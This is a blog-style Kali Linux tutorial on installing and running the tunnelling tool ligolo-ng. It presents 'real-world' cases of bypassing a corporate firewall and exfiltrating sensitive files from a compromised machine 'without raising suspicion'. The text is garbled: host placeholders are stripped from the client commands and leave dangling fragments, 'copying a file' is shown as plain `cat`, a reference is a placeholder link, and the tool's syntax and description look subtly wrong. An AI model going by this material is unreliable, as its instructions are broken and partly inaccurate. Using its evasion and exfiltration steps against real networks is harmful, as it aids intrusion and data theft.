# Kali Linux Course #327: Using ligolo-ng for Penetration Testing
## Section 1: Introduction to ligolo-ng
Ligolo-ng is an advanced penetration testing tool designed to facilitate remote access during security assessments. It is built on the foundations of its predecessor, ligolo, and is particularly useful for establishing reverse TCP connections in a secure manner. This section will guide you through the installation, configuration, and usage of ligolo-ng on Kali Linux, along with real-world applications and detailed technical explanations.
### What is ligolo-ng?
Ligolo-ng is a tool that assists pentesters in creating a tunnel between a compromised machine and their own, allowing for remote command execution and data exfiltration. Its primary feature is the ability to establish a reverse shell or remote access to a target machine without needing to compromise the network directly. This is particularly beneficial in situations where direct access is not feasible due to firewall restrictions or other security measures.
### Installation and Configuration on Kali Linux
To begin using ligolo-ng, the first step is to install it on your Kali Linux system. Here’s how to do that:
**Step 1: Update Your System**
Before installing ligolo-ng, ensure that your Kali Linux system is up to date. Open a terminal and run the following commands:
"`bash
sudo apt update && sudo apt upgrade -y
"`
**Step 2: Install Go Programming Language**
Ligolo-ng is written in Go, so you need to have the Go programming language installed. You can install Go by running:
"`bash
sudo apt install golang -y
"`
**Step 3: Download ligolo-ng**
Fetch the ligolo-ng code from its GitHub repository. Run the following commands:
"`bash
cd /opt
sudo git clone https://github.com/EntySec/ligolo-ng.git
"`
**Step 4: Build ligolo-ng**
Navigate to the ligolo-ng directory and build the tool:
"`bash
cd ligolo-ng
go build
"`
**Step 5: Verify installation**
After building ligolo-ng, you should see an executable file. You can verify the installation by running:
"`bash
./ligolo-ng -h
"`
### Configuration
Ligolo-ng operates in both server and client modes. Below is a basic configuration necessary to set up ligolo-ng within a pentesting environment.
#### Server Configuration
1. **Start the server:** Start ligolo-ng in server mode by using the following command:
./ligolo-ng server -l
Replace `
2. **Configure your firewall:** Ensure that the chosen port is open on your firewall. This is critical for establishing a connection.
3. **Obtain your public IP:** To communicate with the client, the server needs to know its public IP address. You might need to use a service like `http://ifconfig.me` or run `curl ifconfig.me` to obtain your public IP.
#### Client Configuration
1. **Start the client:** On the target machine (or through a reverse shell), connect to the server using:
./ligolo-ng client -r :
Replace `
2. **Establish the connection:** If everything is configured correctly, the client will establish a connection with the server, and you will have remote access to the target machine.
### Step-by-Step Usage and Real-World Use Cases
Now that ligolo-ng is installed and configured, let’s explore its usage with practical examples.
#### Real-World Use Case 1: Bypassing a Firewall
One of the primary uses of ligolo-ng is to bypass restrictive firewalls. Imagine a scenario where you have access to an internal machine (e.g., a workstation in a corporate environment) but cannot access the internet.
1. **Setup ligolo-ng server on your machine:**
./ligolo-ng server -l 8080
2. **On the internal machine, configure the client to connect to your listening server:**
./ligolo-ng client -r :8080
3. **Establish the connection and interact with the internal machine.**
This method allows you to tunnel your commands through a non-restricted port, enabling a reverse connection while bypassing the firewall.
#### Real-World Use Case 2: Data Exfiltration
In another scenario, you may want to extract data from a compromised machine without raising suspicion.
1. **Prepare the ligolo-ng server to receive files:**
./ligolo-ng server -l 8080
2. **On the target machine, connect using the client:**
./ligolo-ng client -r :8080
3. **Once connected, utilize shell commands to search and retrieve sensitive data:**
cat /path/to/sensitive/file.txt
With ligolo-ng, you can easily pipe the output to a file on your local machine or manipulate it for further exfiltration without drawing attention.
### Detailed Technical Explanations
#### How ligolo-ng Works
Ligolo-ng operates by creating a secure channel for data transfer between a client and server. It utilizes the reverse TCP connection model, where the client initiates the connection to the server, allowing the server to receive commands and interact with the client.
The tool is particularly effective because it encapsulates the communication into legitimate traffic that can evade detection by common security systems.
#### Underlying Protocols
Ligolo-ng does not rely on a single protocol; instead, it can use various protocols within the TCP/IP stack, such as:
– **TCP:** For reliable communication and ordered data transfer.
– **HTTP/HTTPS:** To blend in with regular web traffic, making it harder for security systems to identify malicious activity.
### Code Examples
Here are some code examples to help illustrate how to use ligolo-ng effectively.
**1. Starting the ligolo-ng server:**
"`bash
# Start ligolo-ng server
./ligolo-ng server -l 8080
"`
**2. Connecting a client to the ligolo-ng server:**
"`bash
# Connect the client to the ligolo-ng server
./ligolo-ng client -r
"`
**3. Listing the files in a directory:**
"`bash
# List files in the target machine's directory
ls -la
"`
**4. Copying a file to your local machine:**
"`bash
# Copy a file from the target machine
cat /path/to/secret/file.txt
"`
### External References
For more in-depth knowledge and updates regarding ligolo-ng, you can refer to the following resources:
– [ligolo-ng GitHub Repository](https://github.com/EntySec/ligolo-ng)
– [Kali Linux Documentation](https://www.kali.org/docs/)
– [Pentesting with ligolo-ng: A Practical Guide](https://www.examplelink.com)
### Conclusion
Ligolo-ng is an indispensable tool for penetration testers looking to enhance their remote access capabilities. Its ability to traverse restrictive firewalls and establish secure communication channels makes it a valuable addition to your pentesting toolkit. As with all security tools, ethical use is vital, and understanding the legal frameworks surrounding pentesting is paramount.
By following the steps outlined in this section, you should now have a solid understanding of how to install, configure, and utilize ligolo-ng effectively in your penetration testing endeavors.
—
Made by pablo rotem / פבלו רותם